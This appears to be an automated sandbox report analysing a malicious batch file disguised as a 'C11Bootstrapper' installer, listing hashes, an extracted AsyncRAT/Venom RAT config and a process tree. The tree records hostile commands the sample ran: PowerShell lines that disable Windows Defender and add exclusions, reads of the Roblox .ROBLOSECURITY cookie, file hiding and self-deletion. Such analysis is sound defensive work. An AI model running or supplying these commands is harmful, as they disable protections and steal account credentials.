Analysis

  • max time kernel
    308s
  • max time network
    204s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-04-2024 20:37

General

  • Target

    C11Bootstrapper/Properties/IndependenciesInstallation.bat

  • Size

    489B

  • MD5

    d8da01fb6f6288b044868f85228cbb10

  • SHA1

    9d08c813ce59ab863c6ec3c68c336eed265c5e8a

  • SHA256

    74416d022dde876ff622038a6359907da239bbd26ceb7024f5d39dd52f16c9de

  • SHA512

    c92b83ba5513694e05cf908a747609dd6fd3c70944d04a9b8a62939f4372561e4feb567d158b0316853c50a0c241a1c8c075875746a1e538912ea91ff84c308e

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

127.0.0.1:4040

127.0.0.1:4449

Mutex

vydiplhdlyjvmj

Attributes
  • delay

    1

  • install

    true

  • install_file

    PageEditor.exe

  • install_folder

    %Temp%

aes.plain
aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\IndependenciesInstallation.bat"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Windows\system32\timeout.exe
      timeout /t 5
      2⤵
      • Delays execution with timeout.exe
      PID:1288
    • C:\Windows\system32\timeout.exe
      timeout /t 1
      2⤵
      • Delays execution with timeout.exe
      PID:3464
    • C:\Windows\system32\timeout.exe
      timeout /t 3
      2⤵
      • Delays execution with timeout.exe
      PID:3164
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\msgbox.vbs"
      2⤵
        PID:1588
      • C:\Windows\system32\timeout.exe
        timeout /t 4
        2⤵
        • Delays execution with timeout.exe
        PID:2796
      • C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\C11Setup.exe
        C11Setup.exe
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:2568
      • C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\GuiLoader.exe
        GuiLoader.exe
        2⤵
        • Drops file in Drivers directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4420
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5056
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\GuiLoader.exe"
          3⤵
          • Views/modifies file attributes
          PID:3640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\GuiLoader.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2856
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1028
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5044
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4544
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          3⤵
            PID:5064
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            3⤵
              PID:1640
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              3⤵
                PID:4508
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1996
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                3⤵
                • Detects videocard installed
                PID:3620
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\GuiLoader.exe" && pause
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2132
                • C:\Windows\system32\PING.EXE
                  ping localhost
                  4⤵
                  • Runs ping.exe
                  PID:2084
            • C:\Users\Admin\AppData\Local\Temp\C11Bootstrapper\Properties\PageEditor.exe
              PageEditor.exe
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2072

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            627073ee3ca9676911bee35548eff2b8

            SHA1

            4c4b68c65e2cab9864b51167d710aa29ebdcff2e

            SHA256

            85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

            SHA512

            3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            38ecc5b95c11e5a77558753102979c51

            SHA1

            c0759b08ef377df9979d8835d8a7e464cd8eaf6b

            SHA256

            2eb69abe0af5a2fb5bb313533cef641e25016876b874353f7d737c7ad672c79e

            SHA512

            9bf4ce3bc097bdd0242bd105c936a9c9403d5ac83ec99e6a310591a7b8d26309485f3e0cdc4cba67c322f834c325a2b63a008adb078f3a3307094c4b68a48686

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            2e8eb51096d6f6781456fef7df731d97

            SHA1

            ec2aaf851a618fb43c3d040a13a71997c25bda43

            SHA256

            96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

            SHA512

            0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            948B

            MD5

            45741c307af2576c6437c5fdb24ef9ce

            SHA1

            a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf

            SHA256

            7887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2

            SHA512

            39fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            7332074ae2b01262736b6fbd9e100dac

            SHA1

            22f992165065107cc9417fa4117240d84414a13c

            SHA256

            baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

            SHA512

            4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdc3leyo.otz.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

            Filesize

            8B

            MD5

            cf759e4c5f14fe3eec41b87ed756cea8

            SHA1

            c27c796bb3c2fac929359563676f4ba1ffada1f5

            SHA256

            c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

            SHA512

            c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

          • memory/1028-30-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/1028-42-0x000002B6A8C50000-0x000002B6A8C60000-memory.dmp

            Filesize

            64KB

          • memory/1028-44-0x000002B6C12D0000-0x000002B6C141F000-memory.dmp

            Filesize

            1.3MB

          • memory/1028-45-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/1028-31-0x000002B6A8C50000-0x000002B6A8C60000-memory.dmp

            Filesize

            64KB

          • memory/1028-32-0x000002B6A8C50000-0x000002B6A8C60000-memory.dmp

            Filesize

            64KB

          • memory/1996-130-0x0000022B6CB90000-0x0000022B6CCDF000-memory.dmp

            Filesize

            1.3MB

          • memory/1996-128-0x0000022B6C970000-0x0000022B6C980000-memory.dmp

            Filesize

            64KB

          • memory/1996-126-0x0000022B6C970000-0x0000022B6C980000-memory.dmp

            Filesize

            64KB

          • memory/1996-127-0x0000022B6C970000-0x0000022B6C980000-memory.dmp

            Filesize

            64KB

          • memory/1996-125-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/1996-131-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/2072-11-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/2072-9-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/2072-7-0x000000001B9F0000-0x000000001BA00000-memory.dmp

            Filesize

            64KB

          • memory/2072-1-0x0000000000A60000-0x0000000000A78000-memory.dmp

            Filesize

            96KB

          • memory/2568-10-0x00007FFC4DAE0000-0x00007FFC4DCE9000-memory.dmp

            Filesize

            2.0MB

          • memory/2568-78-0x00007FFC4DAE0000-0x00007FFC4DCE9000-memory.dmp

            Filesize

            2.0MB

          • memory/2568-70-0x0000000000EE0000-0x0000000000EF0000-memory.dmp

            Filesize

            64KB

          • memory/2568-4-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/2568-2-0x0000000000610000-0x0000000000654000-memory.dmp

            Filesize

            272KB

          • memory/2568-8-0x0000000000EE0000-0x0000000000EF0000-memory.dmp

            Filesize

            64KB

          • memory/2568-58-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/2856-23-0x0000024453320000-0x0000024453330000-memory.dmp

            Filesize

            64KB

          • memory/2856-21-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/2856-22-0x0000024453320000-0x0000024453330000-memory.dmp

            Filesize

            64KB

          • memory/2856-17-0x0000024453360000-0x0000024453382000-memory.dmp

            Filesize

            136KB

          • memory/2856-28-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/2856-24-0x0000024453320000-0x0000024453330000-memory.dmp

            Filesize

            64KB

          • memory/2856-27-0x000002446B890000-0x000002446B9DF000-memory.dmp

            Filesize

            1.3MB

          • memory/4420-48-0x0000017CA1AA0000-0x0000017CA1B16000-memory.dmp

            Filesize

            472KB

          • memory/4420-100-0x0000017CA1A70000-0x0000017CA1A82000-memory.dmp

            Filesize

            72KB

          • memory/4420-136-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/4420-6-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/4420-49-0x0000017CA1B90000-0x0000017CA1BE0000-memory.dmp

            Filesize

            320KB

          • memory/4420-0-0x0000017C872B0000-0x0000017C872F4000-memory.dmp

            Filesize

            272KB

          • memory/4420-50-0x0000017CA17A0000-0x0000017CA17BE000-memory.dmp

            Filesize

            120KB

          • memory/4420-66-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/4420-99-0x0000017CA1A40000-0x0000017CA1A4A000-memory.dmp

            Filesize

            40KB

          • memory/4544-97-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/4544-96-0x00000199FDCE0000-0x00000199FDE2F000-memory.dmp

            Filesize

            1.3MB

          • memory/4544-94-0x00000199FD550000-0x00000199FD560000-memory.dmp

            Filesize

            64KB

          • memory/4544-83-0x00000199FD550000-0x00000199FD560000-memory.dmp

            Filesize

            64KB

          • memory/4544-84-0x00000199FD550000-0x00000199FD560000-memory.dmp

            Filesize

            64KB

          • memory/4544-82-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/5044-80-0x000001E925E40000-0x000001E925F8F000-memory.dmp

            Filesize

            1.3MB

          • memory/5044-52-0x000001E90D750000-0x000001E90D760000-memory.dmp

            Filesize

            64KB

          • memory/5044-51-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB

          • memory/5044-67-0x000001E90D750000-0x000001E90D760000-memory.dmp

            Filesize

            64KB

          • memory/5044-81-0x00007FFC2CA70000-0x00007FFC2D532000-memory.dmp

            Filesize

            10.8MB